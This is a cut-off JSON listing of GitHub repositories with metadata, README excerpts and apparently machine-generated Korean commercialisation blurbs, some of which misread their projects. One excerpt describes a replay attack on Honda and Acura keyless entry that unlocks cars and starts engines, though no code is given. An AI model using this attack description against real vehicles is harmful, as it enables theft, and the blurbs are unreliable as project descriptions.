本项目已放弃曾用域名googlehosts.org，请小心他人将域名用于制作钓鱼网站。\n[![doodle]][doodle-story]\n\n[doodle]: https://www.google.com/logos/doodles/2019/spring-equinox-2019-northern-hemisphere-5139135894388736-2x.png\n[doodle-story]: https://www.google.com/doodles/spring-2019-northern-hemisphere\n\n|    [Telegram群][telegram-group-link]     | [Telegram通知频道][telegram-channel-link]  |  [hosts自动生成][travis-link]  |    hosts镜像    |\n|                  :---:                   |                   :---:                    |             :---:              |             :---:              |\n| [![telegram-badge]][telegram-group-link] | [![telegram-badge]][telegram-channel-link] | [![travis-badge]][travis-link] | [![mirror-badge-coding]][mirror-link-coding][![mirror-badge-qvqnetwork]][mirror-link-qvqnetwork] |\n\n[telegram-badge]: https://img.shields.io/badge/GoogleHosts-Telegram-brightgreen.svg?style=flat-square\n[telegram-group-link]: https://t.me/googlehosts\n[telegram-channel-link]: https://t.me/googlehostsnews\n[tr","composite_score":0.5,"license_safety_tag":"unknown"},{"name":"HackingIntoYourHeart/Unoriginal-Rice-Patty","github_url":"https://github.com/HackingIntoYourHeart/Unoriginal-Rice-Patty","stars":24,"language":"","license":"unknown","abandonment_months":25,"description":"# Unoriginal-Rice-Patty 프로젝트 분석\n\n## 왜 보물인가\n정확한 프로젝트 설명이 없어 실질적 가치를 판단하기 어렵지만, 24개의 별(관심)을 받은 만큼 특정 커뮤니티에서는 실용적 필요를 충족하는 도구로 인정받고 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 농업·식품 관련 데이터 분석 플랫폼으로 쌀 생산량 예측 및 품","readme_excerpt":"https://user-images.githubusercontent.com/43358273/127954308-5519436a-d980-420d-a6cd-d21e3cf463e3.mp4\n\n# Unoriginal-Rice-Patty\n\n*\"Can you believe that a low-quality garage door has better security than a Honda?\"*\n\n*\"Unoriginal-Rice-Patty\" is my personal title for the Replay-based attack on Honda and Acura vehicles*\n*\"Honda\" in Japanese translates to \"Original Rice Patty\". While a cute fact, this attack is not cute and not original, hence the name*\n\n*This is for educational purposes only. I am in NO WAY liable for any actions executed by means of the contents within this repository. PLEASE use responsibly.*\n\nThis attack seems to affect EVERY Honda/Acura vehicle with remote/wireless radio entry. Honda does *NOT* ever institue a rolling code system and *ONLY* manufactures systems with static codes meaning there is NO layer of security.\n\n## Summary:\nA hacker can gain complete and unlimited access to locking, unlocking, controlling the windows, opening the trunk, and starting the engine of ","composite_score":0.4999,"license_safety_tag":"unknown"},{"name":"stevearc/gkeep.nvim","github_url":"https://github.com/stevearc/gkeep.nvim","stars":15,"language":"Python","license":"MIT","abandonment_months":25,"description":"# gkeep.nvim 보물 분석\n\n## 왜 보물인가\nGoogle Keep의 메모를 텍스트 에디터에서 직접 작성하고 관리할 수 있어, 개발자들이 작업 흐름을 중단하지 않고 메모를 남길 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자 전용 메모 플랫폼으로 IDE 통합 기능을 추가하여 \"코더를 위한 스마트 메모장\" 구독 서비스 운","readme_excerpt":"# Gkeep.nvim\n\n> [!CAUTION]\n> I no longer use Google Keep for notes. The lack of an official API has finally caused me enough pain that I am retiring this plugin.\n\nNeovim integration for [Google Keep](https://keep.google.com/), built using\n[gkeepapi](https://github.com/kiwiz/gkeepapi)\n\n![Screenshot from 2021-07-30 16-25-39](https://user-images.githubusercontent.com/506791/127720705-b44f0b3f-6828-4b73-8ba9-5d747a01427e.png)\n\n## Requirements\n\n- Neovim 0.5\n- Python 3.6+\n- A [patched font](https://www.nerdfonts.com/) (optional. Used for icons)\n\n## Table of Contents\n\n- [Installation](#installation)\n- [Setup](#setup)\n- [Commands](#commands)\n- [Configuration](#configuration)\n- [Features](#features)\n  - [Menu](#menu)\n  - [Note list](#note-list)\n  - [Note editing](#note-editing)\n  - [Links](#links)\n  - [Search](#search)\n  - [Ephemeral notes](#ephemeral-notes)\n  - [File sync](#file-sync)\n- [Third-party integrations](#third-party-integrations)\n  - [Telescope](#telescope)\n  - [Neorg](#neorg)\n- [Hig","composite_score":0.4998,"license_safety_tag":"safe"},{"name":"ChainSafe/web3.js","github_url":"https://github.com/ChainSafe/web3.js","stars":16,"language":"TypeScript","license":"NOASSERTION","abandonment_months":15,"description":"# ChainSafe/web3.js 보물 분석\n\n## 왜 보물인가\n블록체인 기술을 일반 웹사이트나 앱에 쉽게 연결해주는 다리 역할을 하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 암호화폐 거래 플랫폼 (SaaS)**\n- 사용자들이 웹사이트에서 직접 암호화폐를 사고팔 수 있게 해주는 서비스 제공\n\n**2. NFT 마켓플레이스 운영 (SaaS)*","readme_excerpt":"<p align=\"center\">\n  <img src=\"assets/logo/web3js.jpg\" width=\"300\" alt=\"web3.js\" />\n</p>\n\n# Web3.js\n\n### Web3.js libraries are being sunset on March 4th, 2025. For migration guides and more details please refer to [Chainsafe blog](https://blog.chainsafe.io/web3-js-sunset/)\n\n[![Dependency Status][downloads-image]][npm-url] ![Unit Test Coverage](https://img.shields.io/codecov/c/github/web3/web3.js/4.x?label=unit%20test%20coverage)\n![Commit Activity](https://img.shields.io/github/commit-activity/m/web3/web3.js/4.x?label=commit%20activity%20on%204.x)\n![Contributors](https://img.shields.io/github/contributors/web3/web3.js?label=contributors%20on%20all%20branches)\n\n![ES Version](https://img.shields.io/badge/ES-2020-yellow)\n![Node Version](https://img.shields.io/badge/node-14.x-green)\n\nWeb3.js is a TypeScript implementation of the [Ethereum JSON RPC API](https://eth.wiki/json-rpc/API) and related tooling maintained by [ChainSafe Systems](https://chainsafe.io).\n\n## Installation\n\nYou can instal","composite_score":0.4993,"license_safety_tag":"unknown"},{"name":"RussellLuo/slidingwindow","github_url":"https://github.com/RussellLuo/slidingwindow","stars":5,"language":"Go","license":"MIT","abandonment_months":24,"description":"# RussellLuo/slidingwindow 상업화 분석\n\n## 왜 보물인가\n데이터를 일정한 구간씩 나누어 처리하는 기술로, 통신 요금 계산·트래픽 제한·구독료 청구 같은 실생활 서비스에서 핵심적으로 필요한 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **API 트래픽 제한 서비스**: 시간당·일일 요청 건수를 자동으로 제한하는 SaaS로 판매\n2. *","readme_excerpt":"# slidingwindow\n\nGolang implementation of Sliding Window Algorithm for distributed rate limiting.\n\n\n## Installation\n\n```bash\n$ go get -u github.com/RussellLuo/slidingwindow\n```\n\n\n## Design\n\n`slidingwindow` is an implementation of the scalable rate limiting algorithm used by [Kong][1].\n\nSuppose we have a limiter that permits 100 events per minute, and now the time comes at the \"75s\" point, then the internal windows will be as below:\n\n![slidingwindow](docs/slidingwindow.png)\n\nIn this situation, the limiter has permitted 12 events during the current window, which started 15 seconds ago, and 86 events during the entire previous window. Then the count approximation during the sliding window can be calculated like this:\n\n```\ncount = 86 * ((60-15)/60) + 12\n      = 86 * 0.75 + 12\n      = 76.5 events\n```\n\n\n## Test Utility\n\n![prom_reports](docs/prom_reports.png)\n\nFor details, see [testutil](testutil).\n\n\n## Documentation\n\nFor usage and examples see the [Godoc][2].\n\n\n## License\n\n[MIT][3]\n\n\n[1]: ht","composite_score":0.4993,"license_safety_tag":"safe"},{"name":"taizilongxu/interview_python","github_url":"https://github.com/taizilongxu/interview_python","stars":5,"language":"Shell","license":"unknown","abandonment_months":15,"description":"# taizilongxu/interview_python 분석\n\n## 왜 보물인가\n취업 면접에서 자주 나오는 파이썬 프로그래밍 문제들을 한곳에 모아놓은 학습 자료로, 개발자 채용을 준비하는 사람들이 효율적으로 준비할 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **코딩 교육 SaaS**: 면접 준비 플랫폼으로 운영하며 월 구독료를 받고 난이도별 문제","readme_excerpt":"<!-- markdown-toc start - Don't edit this section. Run M-x markdown-toc-generate-toc again -->\n**Table of Contents**\n\n\n   * [Python语言特性](#python语言特性)\n      * [1 Python的函数参数传递](#1-python的函数参数传递)\n      * [2 Python中的元类(metaclass)](#2-python中的元类metaclass)\n      * [3 @staticmethod和@classmethod](#3-staticmethod和classmethod)\n      * [4 类变量和实例变量](#4-类变量和实例变量)\n      * [5 Python自省](#5-python自省)\n      * [6 字典推导式](#6-字典推导式)\n      * [7 Python中单下划线和双下划线](#7-python中单下划线和双下划线)\n      * [8 字符串格式化:\\x和.format](#8-字符串格式化和format)\n      * [9 迭代器和生成器](#9-迭代器和生成器)\n      * [10 *args and <code>**kwargs</code>](#10-args-and-kwargs)\n      * [11 面向切面编程AOP和装饰器](#11-面向切面编程aop和装饰器)\n      * [12 鸭子类型](#12-鸭子类型)\n      * [13 Python中重载](#13-python中重载)\n      * [14 新式类和旧式类](#14-新式类和旧式类)\n      * [15 __new__和<code>__init__</code>的区别](#15-__new__和__init__的区别)\n      * [16 单例模式](#16-单例模式)\n         * [1 使用__new__方法](#1-使用__new__方法)\n         * [2 共享属性](#2-共享属性)\n         * [3 装饰器版本](#3-装饰器版本)\n         * [4 import方法](#4-import方法)\n   ","composite_score":0.4993,"license_safety_tag":"unknown"},{"name":"Jimmey-Jiang/Common.Utility","github_url":"https://github.com/Jimmey-Jiang/Common.Utility","stars":5,"language":"C#","license":"unknown","abandonment_months":42,"description":"# Common.Utility 저장소 분석\n\n## 왜 보물인가\n프로그래머들이 반복적으로 작성하는 기본 기능들을 미리 만들어둔 '재사용 가능한 부품 모음'이라서, 비용과 시간을 크게 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 여러 회사에서 사용하는 웹 기반 관리 시스템(인사관리, 재무관리 등)의 핵심 엔진으로 활용\n2. ","readme_excerpt":"\n## Common.Utility\n\n[![Travis](https://img.shields.io/travis/rust-lang/rust.svg)](https://ci.appveyor.com/project/Jimmey-Jiang/common-utility)\n[![Codeship](https://img.shields.io/codeship/d6c1ddd0-16a3-0132-5f85-2e35c05e22b1.svg)](https://travis-ci.org/Jimmey-Jiang/Common.Utility)\n[![Github Releases (by Asset)](https://img.shields.io/github/downloads/atom/atom/latest/atom-amd64.deb.svg)](https://github.com/Jimmey-Jiang/Common.Utility)\n[![NuGet](https://img.shields.io/nuget/v/DotnetSpider2.Extension.svg)](https://www.nuget.org/packages)\n[![Plugin on redmine.org](https://img.shields.io/redmine/plugin/stars/redmine_xlsx_format_issue_exporter.svg)](https://github.com/Jimmey-Jiang/Common.Utility)\n[![Eclipse Marketplace](https://img.shields.io/eclipse-marketplace/last-update/notepad4e.svg)](https://github.com/Jimmey-Jiang/Common.Utility)\n[![JIRA sprint completion](https://img.shields.io/jira/sprint/https/jira.spring.io/94.svg)](https://github.com/Jimmey-Jiang/Common.Utility)\n[![](https://img","composite_score":0.4989,"license_safety_tag":"unknown"},{"name":"ruinmessi/ASFF","github_url":"https://github.com/ruinmessi/ASFF","stars":8,"language":"Python","license":"GPL-3.0","abandonment_months":59,"description":"","readme_excerpt":"# Learning Spatial Fusion for Single-Shot Object Detection\n\nBy Songtao Liu, Di Huang, Yunhong Wang\n\n### Introduction\nIn this work, we propose a novel and data driven strategy for pyramidal feature fusion, referred to as adaptively spatial feature fusion (ASFF). It learns the way to spatially filter conflictive information to suppress the inconsistency, thus improving the scale-invariance of features, and introduces nearly free inference overhead. For more details, please refer to our [arXiv paper](https://arxiv.org/abs/1911.09516).\n\n<img align=\"center\" src=\"https://github.com/ruinmessi/ASFF/blob/master/doc/asff.png\">\n\n### Updates:\n- YOLOX is [here!](https://github.com/Megvii-BaseDetection/YOLOX), come and use the stronger YOLO!\n- Add MobileNet V2!\n    * The previous models actually are all trained with the wrong anchor setting, we fix the error on mobileNet model.\n    * We currently not support rfb, dropblock and Feature Adaption for mobileNet V2.\n    * FP16 training for mobileNet is n","composite_score":0.4987,"license_safety_tag":"restricted"},{"name":"alibaba/pouch","github_url":"https://github.com/alibaba/pouch","stars":26,"language":"Go","license":"Apache-2.0","abandonment_months":21,"description":"# Alibaba Pouch 분석\n\n## 왜 보물인가\n알리바바가 만든 컨테이너 기술로, 대규모 서비스를 안정적으로 운영하는 기업들이 필요로 하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 서비스 제공업체**: 고객 업무를 격리된 환경에서 실행하는 SaaS 플랫폼의 기반 기술\n2. **기업 내부 IT 도구**: 여러 팀이 사용하는 애플리","readme_excerpt":"\n# PouchContainer - An Efficient Enterprise-class Rich Container Engine\n\n[![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html)\n[![GoDoc](https://godoc.org/github.com/alibaba/pouch?status.svg)](https://godoc.org/github.com/alibaba/pouch)\n[![Build Status](https://travis-ci.org/alibaba/pouch.svg?branch=master)](https://travis-ci.org/alibaba/pouch)\n[![FOSSA Status](https://app.fossa.io/api/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Falibaba%2Fpouch.svg?type=shield)](https://app.fossa.io/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Falibaba%2Fpouch?ref=badge_shield)\n[![Go Report Card](https://goreportcard.com/badge/github.com/alibaba/pouch)](https://goreportcard.com/report/github.com/alibaba/pouch)\n[![codecov](https://codecov.io/gh/alibaba/pouch/branch/master/graph/badge.svg)](https://codecov.io/gh/alibaba/pouch)\n\n![pouchcontainer-logo-800](https://user-images.githubusercontent.com/6755791/39180769-55f3b742-47ea-11e8-8762-78aeed","composite_score":0.4986,"license_safety_tag":"safe"},{"name":"bighuang624/AI-research-tools","github_url":"https://github.com/bighuang624/AI-research-tools","stars":11,"language":"","license":"MIT","abandonment_months":24,"description":"# AI-research-tools 상용화 분석\n\n## 왜 보물인가\nAI 연구에 필요한 여러 도구들을 한곳에 모아둔 저장소로, 연구자들이 복잡한 AI 관련 작업을 더 쉽게 처리할 수 있도록 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **AI 논문 검색 SaaS**: 학술 논문 데이터베이스를 자동으로 정리해주는 구독형 서비스\n2. **대학 연구실 내부 도구*","readme_excerpt":"<h1 align=\"center\">AI Research Tools</h1>\n\n<p align=\"center\">\n  <a href=\"http://kyonhuang.top\" target=\"_blank\"><img src=\"https://img.shields.io/badge/%E4%BD%9C%E8%80%85-KyonHuang-7AD6FD.svg\" alt=\"Author\"></a>\n  <a href=\"https://github.com/bighuang624/AI-research-tools/blob/master/LICENSE\" target=\"_blank\"><img src=\"https://img.shields.io/badge/license-MIT-blue.svg\" alt=\"MIT license\"></a>\n</p>\n\n> * 推荐一些我喜欢的科研工具（有些限定于 AI 领域）\n> * 标记【待尝试】的是我还未使用过但感觉比较有用的工具，会尽快尝试并根据体验决定是否保留\n> * 请通过 issues 等方式向我推荐您觉得好用的但不在此清单上的 AI 领域科研工具，感谢\n\n## 目录  <!-- omit in toc -->\n\n- [趋势关注](#趋势关注)\n  - [RSS 阅读器](#rss-阅读器)\n- [论文查找](#论文查找)\n  - [搜索引擎](#搜索引擎)\n  - [arXiv 相关](#arxiv-相关)\n  - [代码实现查找](#代码实现查找)\n- [论文阅读](#论文阅读)\n  - [查阅下载](#查阅下载)\n  - [文献管理](#文献管理)\n  - [阅读助手](#阅读助手)\n  - [文献翻译](#文献翻译)\n  - [笔记工具](#笔记工具)\n- [编码实验](#编码实验)\n  - [Pytorch 相关](#pytorch-相关)\n    - [功能配置封装](#功能配置封装)\n    - [项目参考](#项目参考)\n    - [项目管理](#项目管理)\n    - [风格指南](#风格指南)\n    - [项目模板](#项目模板)\n    - [神经网络分析器](#神经网络分析器)\n    - [可视化](#可视化)\n  - [实验记录](#实验记录)\n  - [数据","composite_score":0.4985,"license_safety_tag":"safe"},{"name":"ChristianChiarulli/Neovim-from-scratch","github_url":"https://github.com/ChristianChiarulli/Neovim-from-scratch","stars":5,"language":"Lua","license":"GPL-3.0","abandonment_months":22,"description":"# Neovim-from-scratch 상용화 분석\n\n## 왜 보물인가\n프로그래머들이 매일 사용하는 텍스트 편집기를 처음부터 배우고 커스터마이징할 수 있는 완성도 높은 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 초급 개발자를 위한 \"Neovim 완전 정복 과정\"으로 월 구독료 수익화\n2. **기업 개발자 온보딩 서비","readme_excerpt":"# Neovim from scratch\n\nWhen I initially created this repo I didn't anticipate the amount of breaking changes introduced by the rapidly developing plugin ecosystem.  All packages are pinned in `master` so it will remain stable and you can always follow the [videos](https://www.youtube.com/watch?v=ctH-a-1eUME&list=PLhoH5vyxr6Qq41NFL4GvhFp-WLd5xzIzZ)\nthere if you're getting errors in other branches.   \n\n🔍 If you see an error that you can fix [here's how](CONTRIBUTING.md) 🎉.\n\n**Update** For a simple IDE that builds on these principles and is under active development, I recommend my newer repo: [nvim-basic-ide](https://github.com/LunarVim/nvim-basic-ide) as well as [lunarvim](https://www.lunarvim.org/) which is mature and fully-featured.\n\nGeneral support is available on our [Matrix channels](https://matrix.to/#/#neovim-atmachine:matrix.org).\n\n## Try out this config\n\nThis config requires >= [Neovim v0.8.0](https://github.com/neovim/neovim/releases). Please [upgrade](#upgrade-to-neovim-v080) ","composite_score":0.4982,"license_safety_tag":"restricted"},{"name":"CompVis/taming-transformers","github_url":"https://github.com/CompVis/taming-transformers","stars":7,"language":"Jupyter Notebook","license":"MIT","abandonment_months":22,"description":"# CompVis/taming-transformers 분석\n\n## 왜 보물인가\n이 프로젝트는 AI가 그림을 이해하고 생성하는 능력을 획기적으로 향상시킨 기술로, 현재의 모든 이미지 생성 AI의 기초가 되었습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 이미지 생성 SaaS 플랫폼**\n사용자가 텍스트 설명으로 그림을 만드는 웹서비스 (예: Midjourney,","readme_excerpt":"# Taming Transformers for High-Resolution Image Synthesis\n##### CVPR 2021 (Oral)\n![teaser](assets/mountain.jpeg)\n\n[**Taming Transformers for High-Resolution Image Synthesis**](https://compvis.github.io/taming-transformers/)<br/>\n[Patrick Esser](https://github.com/pesser)\\*,\n[Robin Rombach](https://github.com/rromb)\\*,\n[Björn Ommer](https://hci.iwr.uni-heidelberg.de/Staff/bommer)<br/>\n\\* equal contribution\n\n**tl;dr** We combine the efficiancy of convolutional approaches with the expressivity of transformers by introducing a convolutional VQGAN, which learns a codebook of context-rich visual parts, whose composition is modeled with an autoregressive transformer.\n\n![teaser](assets/teaser.png)\n[arXiv](https://arxiv.org/abs/2012.09841) | [BibTeX](#bibtex) | [Project Page](https://compvis.github.io/taming-transformers/)\n\n\n### News\n#### 2022\n- More pretrained VQGANs (e.g. a f8-model with only 256 codebook entries) are available in our new work on [Latent Diffusion Models](https://github.com/C","composite_score":0.4977,"license_safety_tag":"safe"},{"name":"jeremybarbet/react-native-modalize","github_url":"https://github.com/jeremybarbet/react-native-modalize","stars":10,"language":"TypeScript","license":"MIT","abandonment_months":24,"description":"# react-native-modalize 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱에서 화면 하단에서 올라오는 팝업창을 쉽게 만들 수 있는 도구로, 앱 개발자들의 개발 시간을 크게 단축시킵니다.\n\n## 어디에 쓸 수 있나\n\n**1. 모바일 앱 개발 서비스**\n- 앱 제작 회사가 이 도구를 기반으로 빠르고 저렴한 앱 개발 서비스 제공\n- 고객사 요청에 따","readme_excerpt":"# Modalize\n\n[![npm version](https://badge.fury.io/js/react-native-modalize.svg)](https://badge.fury.io/js/react-native-modalize)\n\nA highly customizable modal/bottom sheet that loves scrolling content.\n\nThis component has been built with `react-native-gesture-handler` to address the common issue of **scrolling**, **swiping** and handling the **keyboard** behaviors, you can face with react-native's modal.\n\nThis component comes with a ScrollView, the default renderer, a FlatList or a SectionList. They are all three built-in and make your life easier, just pass your content and Modalize will handle the rest for you. You can also have the possibility to pass your own custom renderer.\n\n<p align=\"left\">\n  <img src=\"https://user-images.githubusercontent.com/937328/80501705-458d2d80-895f-11ea-9667-d193c135cabf.gif\" height=\"542\" alt=\"Simple\" />\n  <img src=\"https://user-images.githubusercontent.com/937328/80501698-42923d00-895f-11ea-8db0-da3d4f772710.gif\" height=\"542\" alt=\"Fixed\" />\n  <img src=\"h","composite_score":0.4971,"license_safety_tag":"safe"},{"name":"lusaxweb/vuesax","github_url":"https://github.com/lusaxweb/vuesax","stars":5,"language":"Vue","license":"MIT","abandonment_months":22,"description":"# Vuesax 저장소 분석 보고서\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 아름다운 UI 디자인 요소들(버튼, 메뉴, 입력창 등)을 쉽게 가져다 쓸 수 있는 도구모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 회계관리 웹앱을 만들 때 Vuesax의 디자인 요소를 사용해 개발 기간을 50% 단축\n2. **내부 업무 도구","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://lusaxweb.github.io/vuesax/\">\n<img width=\"40%\" src=\"https://raw.githubusercontent.com/lusaxweb/vuesax/master/public/vuesax-logo-beta.png\" alt=\"vuesax\" />\n<img src=\"https://raw.githubusercontent.com/lusaxweb/vuesax/master/public/vuesax-components.gif\" alt=\"vuesax\" />\n   </a>\n  </p>\n\n  </br>\n\n  <p align=\"center\">\n  <a href=\"https://travis-ci.org/lusaxweb/vuesax\">\n    <img src=\"https://img.shields.io/travis/lusaxweb/vuesax.svg\" alt=\"travis ci badge\">\n  </a>\n  <a href=\"https://www.npmjs.com/package/vuesax\">\n    <img src=\"https://img.shields.io/npm/dm/vuesax.svg\" alt=\"Downloads\">\n  </a>\n  <a href=\"https://www.npmjs.com/package/vuesax\">\n    <img src=\"https://img.shields.io/npm/v/vuesax.svg\" alt=\"Version\">\n  </a>\n  <a href=\"https://www.npmjs.com/package/vuesax\"><img src=\"https://img.shields.io/npm/l/vuesax.svg\" /></a>\n  <a href=\"https://discord.gg/6AZNXEa\">\n    <img src=\"https://discordapp.com/api/guilds/467198491920433153/widget.png\" alt=\"Chat\">\n  </a>\n</","composite_score":0.4971,"license_safety_tag":"safe"},{"name":"Tencent/flare","github_url":"https://github.com/Tencent/flare","stars":82,"language":"C++","license":"NOASSERTION","abandonment_months":24,"description":"# Tencent/flare 상용화 분석\n\n## 왜 보물인가\n대형 기술 기업(텐센트)에서 개발한 만큼 기술 완성도가 높고, 82개의 관심(Stars)을 받으며 지속적으로 유지보수되고 있어 실제 사용 가능한 수준의 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹사이트나 앱 성능을 자동으로 모니터링하고 문제를 알려주는 유료 서비스\n2","readme_excerpt":"# Flare 后台服务开发框架\n\nFlare Backend Service Framework\n\n[English Document](README-en.md)\n\n[![license NewBSD](https://img.shields.io/badge/license-BSD-yellow.svg)](LICENSE)\n[![C++](https://img.shields.io/badge/language-C++-blue.svg)](https://isocpp.org/)\n[![Code Style](https://img.shields.io/badge/code%20style-google-blue.svg)](https://google.github.io/styleguide/cppguide.html)\n[![Platform](https://img.shields.io/badge/platform-linux%20-lightgrey.svg)](https://www.kernel.org/)\n\n[腾讯广告](https://e.qq.com/ads/) 是腾讯公司最重要的业务之一，其后台大量采用 C++ 开发。\n\nFlare 是我们吸收先前服务框架和业界开源项目及最新研究成果开发的现代化的后台服务开发框架，旨在提供针对目前主流软硬件环境下的易用、高性能、平稳的服务开发能力。\n\nFlare 项目开始于 2019 年，目前广泛应用于腾讯广告的众多后台服务，拥有数以万计的运行实例，在实际生产系统上经受了足够的考验。\n\n2021 年 5 月，本着回馈社区、技术共享的精神，正式对外开源。\n\n## 特点\n\n- 现代 C++ 设计风格，广泛采用了 C++11/14/17/2a 的新的语法特性和标准库\n- 提供了 [M:N 的线程模型](https://en.wikipedia.org/wiki/Thread_(computing))的微线程实现[Fiber](flare/doc/fiber.md)，方便业务开发人员以便利的同步调用语法编写高性能的异步调用代码\n- 支持基于消息的[流式 RPC](flare/doc/streaming-rpc.md)支持\n- 除了 RPC 外，还提供了一系列便利的[基础库](flare/base)，比如","composite_score":0.4969,"license_safety_tag":"unknown"},{"name":"valentinxxx/nginxconfig.io","github_url":"https://github.com/valentinxxx/nginxconfig.io","stars":21,"language":"JavaScript","license":"MIT","abandonment_months":18,"description":"# nginxconfig.io 프로젝트 분석\n\n## 왜 보물인가\n복잡한 웹 서버 설정을 마우스 클릭만으로 자동 생성해주는 도구로, 기술 담당자들의 수십 시간 작업을 몇 분으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**SaaS 서비스**: 웹사이트 운영자가 구독하면 간편한 인터페이스에서 서버 설정을 자동으로 생성받을 수 있습니다.\n\n**내부 업무","readme_excerpt":"[![GitHub stars](https://img.shields.io/github/stars/digitalocean/nginxconfig.io.svg)](https://github.com/digitalocean/nginxconfig.io/stargazers)\n[![GitHub contributors](https://img.shields.io/github/contributors/digitalocean/nginxconfig.io.svg?color=blue)](https://github.com/digitalocean/nginxconfig.io/graphs/contributors)\n[![MIT License](https://img.shields.io/github/license/digitalocean/nginxconfig.io.svg?color=blue)](https://github.com/digitalocean/nginxconfig.io/blob/master/LICENSE)\n<br />\n[![Closed issues](https://img.shields.io/github/issues-closed-raw/digitalocean/nginxconfig.io.svg?color=brightgreen)](https://github.com/digitalocean/nginxconfig.io/issues?q=is%3Aissue+is%3Aclosed)\n[![Closed PR](https://img.shields.io/github/issues-pr-closed-raw/digitalocean/nginxconfig.io.svg?color=brightgreen)](https://github.com/digitalocean/nginxconfig.io/pulls?q=is%3Apr+is%3Aclosed)\n[![Open issues](https://img.shields.io/github/issues-raw/digitalocean/nginxconfig.io.svg)](https://github.com","composite_score":0.4964,"license_safety_tag":"safe"},{"name":"erikras/redux-form","github_url":"https://github.com/erikras/redux-form","stars":13,"language":"JavaScript","license":"mit","abandonment_months":24,"description":"# Redux-Form 저장소 분석\n\n## 왜 보물인가\n웹 서비스에서 사용자가 입력하는 모든 정보(회원가입, 결제, 설문 등)를 쉽게 관리할 수 있게 해주는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독형 앱의 회원가입, 결제 정보, 설정 변경 페이지의 입력 양식 관리\n2. **내부 업무 도구**: 직원 정보 관리, 휴가 ","readme_excerpt":"[<img src=\"https://raw.githubusercontent.com/redux-form/redux-form/master/logo.png\" align=\"right\" class=\"logo\" height=\"100\" width=\"165\"/>](https://redux-form.com/)\n\n# redux-form\n\n---\n\n[<img src=\"form-nerd-logo.png\" align=\"left\"/>](https://formnerd.co/redux-form-readme) **You build great forms, but do you know HOW users use your forms? [Find out with Form Nerd!](https://formnerd.co/redux-form-readme) Professional analytics from the creator of Redux Form.**\n\n---\n\n[![NPM Version](https://img.shields.io/npm/v/redux-form.svg?style=flat)](https://www.npmjs.com/package/redux-form)\n[![NPM Downloads](https://img.shields.io/npm/dm/redux-form.svg?style=flat)](https://npmcharts.com/compare/redux-form?minimal=true)\n[![Build Status](https://img.shields.io/travis/redux-form/redux-form/v6.svg?style=flat)](https://travis-ci.com/redux-form/redux-form)\n[![codecov.io](https://codecov.io/gh/redux-form/redux-form/branch/master/graph/badge.svg)](https://codecov.io/gh/redux-form/redux-form)\n[![Code Climate](h","composite_score":0.4958,"license_safety_tag":"safe"},{"name":"gwding/draw_convnet","github_url":"https://github.com/gwding/draw_convnet","stars":6,"language":"Python","license":"unknown","abandonment_months":23,"description":"# gwding/draw_convnet 분석 보고서\n\n## 왜 보물인가\n인공지능 모델의 구조를 시각적으로 그려주는 도구로, 복잡한 AI 기술을 이미지로 쉽게 설명할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS**: 대학과 온라인 강좌에서 AI 개념 설명 시각화 도구로 구독 판매\n2. **기업 내부 도구**: AI 회사들이 직원 교육 및","readme_excerpt":"# draw_convnet\n\nPython script for illustrating Convolutional Neural Network (ConvNet)\n\n## Example image\nWith `flag_omit=False`\n![](https://raw.githubusercontent.com/gwding/draw_convnet/master/convnet_fig.png)\n\nWith `flag_omit=True`\n![](https://raw.githubusercontent.com/gwding/draw_convnet/ccaa14e2f8e41580bd29b97a501f7a4218779356/convnet_fig_with_omitted_channel.png)\n\n\n## Known issues\nThe issue with matplotlib 2.0.x has been resolved, please let me know if you encounter problems.\n\n~~`Line2D` doesn't seem to work well under `python3 + matplotlib 2.0.0` as pointed out by @ahoereth~~\n\n## Using the code\nIt is NOT required to cite anything to use the code.\n\nIf you are not facing space limitation and it does not break the flow of the paper, you might consider adding something like \"This figure is generated by adapting the code from https://github.com/gwding/draw_convnet\" (maybe in the footnote).\n\nFYI, originally I used the code to generate the convnet figure in this paper \"Automatic moth dete","composite_score":0.4957,"license_safety_tag":"unknown"},{"name":"idealo/image-quality-assessment","github_url":"https://github.com/idealo/image-quality-assessment","stars":21,"language":"Python","license":"Apache-2.0","abandonment_months":23,"description":"","readme_excerpt":"# Image Quality Assessment\n\n[![Build Status](https://travis-ci.org/idealo/image-quality-assessment.svg?branch=master)](https://travis-ci.org/idealo/image-quality-assessment)\n[![Docs](https://img.shields.io/badge/docs-online-brightgreen)](https://idealo.github.io/image-quality-assessment/)\n[![License](https://img.shields.io/badge/License-Apache%202.0-orange.svg)](https://github.com/idealo/image-quality-assessment/blob/master/LICENSE)\n\nThis repository provides an implementation of an aesthetic and technical image quality model based on Google's research paper [\"NIMA: Neural Image Assessment\"](https://arxiv.org/pdf/1709.05424.pdf). You can find a quick introduction on their [Research Blog](https://research.googleblog.com/2017/12/introducing-nima-neural-image-assessment.html).\n\nNIMA consists of two models that aim to predict the aesthetic and technical quality of images, respectively. The models are trained via transfer learning, where ImageNet pre-trained CNNs are used and fine-tuned for ","composite_score":0.4956,"license_safety_tag":"safe"},{"name":"phuoc-ng/1loc","github_url":"https://github.com/phuoc-ng/1loc","stars":7,"language":"MDX","license":"MIT","abandonment_months":23,"description":"# phuoc-ng/1loc 분석 보고서\n\n## 왜 